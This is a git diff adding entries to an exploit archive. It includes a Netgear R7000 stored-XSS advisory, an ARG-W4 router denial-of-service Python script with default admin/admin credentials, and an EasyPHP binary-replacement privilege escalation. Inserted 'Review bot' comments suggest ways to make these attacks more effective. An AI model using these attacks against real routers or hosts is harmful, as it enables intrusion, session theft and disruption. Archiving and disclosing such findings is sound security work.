diff --git a/files.csv b/files.csv
index faf88debe..bec4b9934 100644
--- a/files.csv
+++ b/files.csv
@@ -3073,7 +3073,7 @@ id,file,description,date,author,platform,type,port
 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0
 23654,platforms/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
-23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
+23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
@@ -3256,7 +3256,7 @@ id,file,description,date,author,platform,type,port
 24741,platforms/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,windows,dos,0
 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0
 24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
-24755,platforms/linux/dos/24755.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
+24755,platforms/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
 24756,platforms/linux/dos/24756.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0
 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0
 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0
@@ -3926,7 +3926,7 @@ id,file,description,date,author,platform,type,port
 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC",2014-01-31,"Kees Cook",linux,dos,0
+31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",linux,dos,0
 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
@@ -8691,6 +8691,7 @@ id,file,description,date,author,platform,type,port
 40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
+40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -20516,7 +20517,7 @@ id,file,description,date,author,platform,type,port
 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0
-7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
+7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
@@ -36862,3 +36863,5 @@ id,file,description,date,author,platform,type,port
 40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0
 40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0
 40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
+40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
+40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
diff --git a/platforms/hardware/webapps/40898.txt b/platforms/hardware/webapps/40898.txt
new file mode 100755
index 000000000..8f3591284
--- /dev/null
+++ b/platforms/hardware/webapps/40898.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
+# Date: 11-12-2016
+# Exploit Author: Vincent Yiu
+# Contact: https://twitter.com/vysecurity
+# Vendor Homepage: https://www.netgear.com/
+# Category: Hardware / WebApp
+# Version: V1.0.7.2_1.1.93 + LATEST to date
+
+-Vulnerability
+An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.
+
+Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.
+
+http://RouterIP/start.htm
+
+Then visit the "view who's connected" page.
+
+-Proof Of Concept
+Set /etc/dhcp/dhclient.conf
+
+send host-name "";
diff --git a/platforms/hardware/webapps/40901.txt b/platforms/hardware/webapps/40901.txt
new file mode 100755
index 000000000..8bc6a4b68
--- /dev/null
+++ b/platforms/hardware/webapps/40901.txt
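Review bot: The proof-of-concept line `send host-name "";` carries an empty hostname, so as rendered the PoC never exercises the script-tag payload the Vulnerability section relies on; if the payload was lost in transit it should be restored, and the note should warn that DHCP option 12 is limited to 255 bytes (the router may truncate further), so the payload has to be a short loader rather than a full script. The version line `V1.0.7.2_1.1.93 + LATEST to date` should name the exact firmware that was tested and whether a vendor fix or CVE exists, because "latest to date" stops meaning anything the day after publication. The cookie-theft impact is an assumption as written: the advisory should state whether the R7000 admin UI is session-cookie based or protected by HTTP Basic auth, since only the former makes the stolen-cookie scenario real, while the stored XSS still permits forged requests from the admin's browser in either case. The sentence should also read "A user who has access to send DHCP requests via either a VPN or a wireless connection" to make clear that the attacker only needs to be a DHCP client on any interface the router serves.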
@@ -0,0 +1,66 @@
+# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
+# Date: 2016-12-11
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM
+# Tested on: Windows AND Linux
+# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
+
+1 - Denial of Service
+
+#!/usr/bin/python
+import urllib2
+import urllib
+
+site=raw_input("Enter Url : ")
+site=site+"/form2Upnp.cgi"
+username='admin'
+password='admin'
+p = urllib2.HTTPPasswordMgrWithDefaultRealm()
+p.add_password(None, site, username, password)
+handler = urllib2.HTTPBasicAuthHandler(p)
+opener = urllib2.build_opener(handler)
+urllib2.install_opener(opener)
+
+post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
+data = urllib.urlencode(post)
+try:
+ html = urllib2.urlopen(site,data)
+ print ("Done ! c_C")
+except:
+ print ("Done ! c_C")
+
+2-1 Cross-Site Request Forgery (Add Admin)
+
+
+
+
+
+
+
+2-2 Cross-Site Request Forgery (Change DNS)
+
+
+
+
+
+
+
+
+
diff --git a/platforms/windows/local/40902.txt b/platforms/windows/local/40902.txt
new file mode 100755
index 000000000..afb7478dd
--- /dev/null
+++ b/platforms/windows/local/40902.txt
@@ -0,0 +1,28 @@
+Title: EasyPHP Devserver Insecure File Permissions Privilege Escalation
+Application: EasyPHP Devserver
+Versions Affected: 16.1
+Vendor URL: http://www.easyphp.org/
+Discovered by: Ashiyane Digital Security Team ~ Micle
+Tested on: Windows 10 Professional x86
+Bugs: Insecure File Permissions Privilege Escalation
+Source: http://www.micle.ir/exploits/1003
+Date: 10-Dec-2016
+
+Description:
+EasyPHP installs by default to "C:\Program Files\EasyPHP-Devserver-16.1"
+with very weak file permissions granting any
+user full permission to the exe. This allows opportunity for code
+execution against any other user running the application.
+
+Proof:
+C:\Program Files\EasyPHP-Devserver-16.1>cacls run-easyphp-devserver.exe
+C:\Program Files\EasyPHP-Devserver-16.1\run-easyphp-devserver.exe
+BUILTIN\Users:(ID)C
+NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(ID)R
+
+Exploit:
+Simply replace run-easyphp-devserver.exe and wait for execution.
+
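Review bot: The bare `except:` in the Denial of Service script prints the same `Done ! c_C` whether the POST succeeded, the connection was refused, or the router answered 401 to the hard-coded `admin`/`admin` credentials, so the operator learns nothing about whether the target was reachable or authenticated; catch the specific error and report it, e.g. `except urllib2.URLError as e:` / `    print("Request failed: %s" % e)`, and on success print `html.getcode()` instead of a fixed string. The credentials should be prompted for or taken as arguments like the URL, the script is Python 2 only (`urllib2`, `raw_input`) and the header should say so, and a URL entered without a scheme makes `urlopen` raise, which the current handler silently swallows. Sections 2-1 and 2-2 contain no CSRF form bodies in this hunk as rendered; if the HTML was stripped in transit it must be restored before the entry is usable, and the advisory should state the firmware version tested and what the `daemon=' '` value actually does to the device beyond the claimed DoS.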
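Review bot: The Description says the installer grants any user "full permission" to the executable, but the cacls output in the Proof section shows `BUILTIN\Users:(ID)C`, which is Change (read/write/execute/delete), not Full Control (F); the text should say "modify access" so the finding matches its own evidence. The Exploit section's "replace run-easyphp-devserver.exe and wait for execution" only crosses a privilege boundary when a more privileged account (an administrator, or a service or scheduled task) later launches the replaced binary, so that precondition should be stated explicitly rather than implied. The versions also disagree: the advisory says `Versions Affected: 16.1` and the install path is `EasyPHP-Devserver-16.1`, while the new files.csv entry for 40902 in this commit calls it 16.1.1, and one of the two should be corrected.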